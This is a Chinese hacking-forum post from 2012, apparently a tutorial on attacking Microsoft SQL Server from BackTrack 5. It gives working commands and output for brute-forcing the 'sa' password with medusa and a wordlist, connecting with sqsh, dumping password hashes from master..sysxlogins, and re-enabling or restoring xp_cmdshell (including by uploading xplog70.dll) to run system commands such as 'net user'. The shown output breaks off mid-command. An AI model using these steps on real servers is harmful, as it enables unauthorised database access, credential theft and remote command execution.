切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
298 :Pentesting Mssql USE BT5 1[复制链接]
发表于 2012-10-9 00:07:54 | 显示全部楼层 |!read_mode!
好吧 来一次BT5
如果是UBUNTU需要:
  1. root@Dis9Team:/pen/web# sudo apt-get install python-setuptools python-mysqldb
  2. root@Dis9Team:/pen/web# easy_install sqlalchemy  # PYTHON数据库查询的东东
复制代码

Scnner Mssql
  1. root@bt:~# medusa -h 5.5.5.3 -u sa -P /pentest/passwords/wordlists/darkc0de.lst -O /tmp/1 -M mssql
复制代码

#/pentest/passwords/wordlists/ BT5默认字典位置
查看结果:
  1. root@bt:/tmp# cat 1 | grep 5.5.5.3
  2. # medusa -h 5.5.5.3 -u sa -p 123456 -O /tmp/1 -M mssql
  3. ACCOUNT FOUND: [mssql] Host: 5.5.5.3 User: sa Password: 123456 [SUCCESS]
  4. root@bt:/tmp#
复制代码

Select MSSQLsqsh是LINUX下著名的MSSQL连接器
  1. root@bt:/tmp# apt-get install sqsh
复制代码
链接
  1. root@bt:~# sqsh -S 5.5.5.3 -U sa
  2. sqsh-2.1 Copyright (C) 1995-2001 Scott C. Gray
  3. This is free software with ABSOLUTELY NO WARRANTY
  4. For more information type '\warranty'
  5. Password:
  6. 1>
复制代码

接下来进行查询
  1. 1> select @@version
  2. 2> go

  3.         ---------------------------------------------------------------------------------------------------------------------------------------
  4. ------------------------------------------------------------------------------------------------------------------------

  5.         Microsoft SQL Server  2000 - 8.00.2039 (Intel X86)
  6.         May  3 2005 23:18:38
  7.         Copyright (c) 1988-2003 Microsoft Corporation
  8.         Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2)

  9. (1 row affected)
  10. 1> SELECT name, password FROM master..sysxlogins
  11. 2> go

  12.         name                                                                                                                                   

  13.         password                                                                                                                              

  14.         ---------------------------------------------------------------------------------------------------------------------------------------
  15. ------------------------------------------------------------------------------------------------------------------------
  16.         ---------------------------------------------------------------------------------------------------------------------------------------
  17. -------------------------------------------------------------------------------------------------------------------------

  18.         BUILTIN\Administrators                                                                                                                 

  19.         NULL                                                                                                                                   

  20.         sa                                                                                                                                    

  21.         0100400f3764711bbab9342f3ecb2584417a7ecfd548a2ce2c61711bbab9342f3ecb2584417a7ecfd548a2ce2c61                                          

  22.         NULL                                                                                                                                   

  23.         NULL                                                                                                                                   

  24. (3 rows affected)
复制代码

xp_cmdshell
  1. 1> SP_CONFIGURE 'show advanced options', 1
  2. 2> go
  3. Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
  4. (return status = 0)
  5. 1> SP_CONFIGURE 'xp_cmdshell', 1
  6. 2> go
  7. Msg 15123, Level 16, State 1
  8. Server 'FUZZEXP-F60914C', Procedure 'sp_configure', Line 79
  9. The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.

  10. Valid configuration options are:
  11. name                                                                   minimum     maximum     config_value run_value  
  12. ---------------------------------------------------------------------- ----------- ----------- ------------ -----------
  13. recovery interval (min)                                                          0       32767            0           0
  14. allow updates                                                                    0           1            0           0
  15. user connections                                                                 0       32767            0           0
  16. locks                                                                         5000  2147483647            0           0
  17. open objects                                                                     0  2147483647            0           0
  18. fill factor (%)                                                                  0         100            0           0
  19. media retention                                                                  0         365            0           0
  20. nested triggers                                                                  0           1            1           1
  21. remote access                                                                    0           1            1           1
  22. two digit year cutoff                                                         1753        9999         2049        2049
  23. default full-text language                                                       0  2147483647         2052        2052
  24. default language                                                                 0        9999           30          30
  25. max worker threads                                                              32       32767          255         255
  26. remote proc trans                                                                0           1            0           0
  27. network packet size (B)                                                        512       32767         4096        4096
  28. index create memory (KB)                                                       704  2147483647            0           0
  29. priority boost                                                                   0           1            0           0
  30. show advanced options                                                            0           1            1           1
  31. remote login timeout (s)                                                         0  2147483647           20          20
  32. remote query timeout (s)                                                         0  2147483647          600         600
  33. cursor threshold                                                                -1  2147483647           -1          -1
  34. min memory per query (KB)                                                      512  2147483647         1024        1024
  35. query wait (s)                                                                  -1  2147483647           -1          -1
  36. set working set size                                                             0           1            0           0
  37. user options                                                                     0       32767            0           0
  38. affinity mask                                                          -2147483648  2147483647            0           0
  39. max text repl size (B)                                                           0  2147483647        65536       65536
  40. cost threshold for parallelism                                                   0       32767            5           5
  41. max degree of parallelism                                                        0          32            0           0
  42. min server memory (MB)                                                           0  2147483647            0           0
  43. max server memory (MB)                                                           4  2147483647   2147483647  2147483647
  44. query governor cost limit                                                        0  2147483647            0           0
  45. lightweight pooling                                                              0           1            0           0
  46. scan for startup procs                                                           0           1            0           0
  47. c2 audit mode                                                                    0           1            0           0
  48. awe enabled                                                                      0           1            0           0
  49. Cross DB Ownership Chaining                                                      0           1            0           0

  50. (return status = 1)
  51. 1>
复制代码

xp_cmdshell的删除及恢复1、恢复xp_cmdshell的方法
删除扩展存储过过程xp_cmdshell的语句
exec sp_dropextendedproc ’xp_cmdshell’
2、恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’
exec master.dbo.addextendedproc ’xp_cmdshell’,’xplog70.dll’;select count(*) from master.dbo.sysobjects where xtype=’x’ and
返回结果为1就ok
否则需上传c:\inetput\web\xplog70.dll后
exec master.dbo.sp_addextendedproc ’xp_cmdshell’,’c:\inetput\web\xplog70.dll’;–
3、如果是用以下方法删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc ’xp_cmdshell’
则可以用以下语句恢复
dbcc addextendedproc (“sp_oacreate”,”odsole70.dll”)
dbcc addextendedproc (“xp_cmdshell”,”xplog70.dll”)
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
运行cmdshell
[code]1> exec master..xp_cmdshell "net user"
2> go

        output                                                                                                                                 

        ---------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------

        NULL                                                                                                                                   

        \\
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-21 06:56

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部